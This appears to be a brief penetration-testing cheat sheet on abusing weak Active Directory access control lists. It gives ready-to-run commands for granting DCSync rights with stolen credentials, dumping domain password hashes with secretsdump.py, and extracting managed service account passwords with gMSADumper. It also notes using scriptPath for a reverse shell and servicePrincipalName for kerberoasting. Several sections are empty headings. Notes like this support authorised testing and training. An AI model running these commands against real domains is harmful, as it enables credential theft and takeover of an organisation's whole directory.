Abuse Weak Access Control Lists (ACLs)

Write DACL

$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPassword
Add-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSync

From the attacking box

secretsdumps.py $domain/user@$ip

GetChangesAll (DCSync)

From the attacking box

secretsdump.py domain/user@ip

Or use Mimikatz

ReadGMSApassword

Remotely

You may need to use ntpdate $domain if you get clockscrew error

python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password

Locally

ForceChangePassword

GenericAll

GenericWrite

Use this for reverseshell using scriptpath=, enumeration, or use serviceprincipalname= for kerberoast

OR

WriteOwner

Automation

Find ACLs of interest whether it be the current compromised user, or users found. start with current user.

Last updated